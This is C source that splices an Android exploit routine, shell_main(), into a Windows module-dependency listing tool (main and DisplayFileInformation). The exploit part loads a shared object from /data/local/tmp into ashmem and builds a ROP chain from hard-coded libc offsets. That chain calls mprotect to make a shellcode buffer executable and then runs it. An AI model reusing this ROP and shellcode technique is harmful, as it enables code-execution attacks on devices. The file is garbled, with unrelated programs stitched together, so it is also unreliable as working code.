int main( int argc, char * argv[] )
{
if ( !ProcessCommandLine( argc, argv ) )
{
printf( "%s %d bit build\n%s",argv[0],8*sizeof(void*),g_szHelpSyntax );
return 1;
}
MODULE_DEPENDENCY_LIST depends( g_pszPrimaryFile );
if ( !depends.IsValid() )
{
printf( "Error: %s %s\n", g_pszPrimaryFile, depends.GetErrorString() );
return 1;
}
PMODULE_FILE_INFO pModInfo = 0;
while ( pModInfo = depends.GetNextModule( pModInfo ) )
{
DisplayFileInformation( pModInfo,g_fQuiet );
PMODULE_FILE_INFO pNotFound = 0;
while ( pNotFound = pModInfo->GetNextNotFoundModule(pNotFound) )
{
LPCTSTR base = getModuleBase(pNotFound,g_fQuiet) ;
if ( base ) printf( " Not found: %s\n", base );
}
}
return 0;
}
void shell_main(){
dlopen_t dlopen_f = (dlopen_t)getProcAddr(NULL,"dlopen");
dlsym_t dlsym_f = (dlsym_t)getProcAddr(NULL,"dlsym");
const char *so_name = "/data/local/tmp/testso.so";
char *code = (char*)get_so_buffer(so_name);
int ashmem_len = *(int*)code;
int fd_memory = ashmem_create_region("shmem", ashmem_len);
ashmem_pin_region(fd_memory, 0, 0);
uint8_t *shm = (uint8_t*)mmap(NULL, ashmem_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd_memory, 0);
printf("first map address is %p\n",shm);
memcpy(shm,code,ashmem_len);
free(code);
//ashmem_unpin_region(fd_memory, 0, 0);
int pos[32]={12,2,12,fd_memory};
//shellcode(dlopen_f,pos);
uint32_t libcbase = (uint32_t)getModuleBase("libc.so");
uint32_t mprotect_address = (uint32_t)getProcAddr("libc.so","mprotect");
uint32_t len = 0;
void *buffer = get_shellcode(&len);
uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,(uint32_t)pos,2,(uint32_t)buffer+1};
//uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,1,2,(uint32_t)shellcode};
asmm_test((uint32_t)ropData);
free(buffer);
exit(-1);
}
void DisplayFileInformation( PMODULE_FILE_INFO pModInfo, BOOL bQuiet )
{
LPCTSTR base = getModuleBase(pModInfo,bQuiet);
if ( !base ) return ;
printf( "%-14s", base) ; // ->GetBaseName() );
PSTR pszFullName = pModInfo->GetFullName();
if ( g_fShowDateTime )
{
HFILE hFile = _lopen( pszFullName, OF_READ );
if ( HFILE_ERROR != hFile )
{
FILETIME ft;
if ( GetFileTime( (HANDLE)hFile, 0, 0, &ft ) )
{
char szFileDate[32] = { 0 };
char szFileTime[32] = { 0 };
GetFileDateAsString(&ft, szFileDate, sizeof(szFileDate) );
GetFileTimeAsString(&ft, szFileTime, sizeof(szFileTime),
TRUE);
printf( "%s %s ", szFileDate, szFileTime );
}
_lclose( hFile );
}
}
if ( g_fShowLinkDateTime )
{
FILETIME ft;
char szFileDate[32] = { 0 };
char szFileTime[32] = { 0 };
PE_EXE exe( pszFullName );
TimeDateStampToFileTime( exe.GetTimeDateStamp(), &ft );
GetFileDateAsString(&ft, szFileDate, sizeof(szFileDate) );
GetFileTimeAsString(&ft, szFileTime, sizeof(szFileTime),
TRUE);
printf( "%s %s ", szFileDate, szFileTime );
}
if ( g_fShowFullPath )
printf( "(%s)", pszFullName );
printf( "\n" );
if ( g_fShowVersion )
ShowVersionInfo( pszFullName );
}
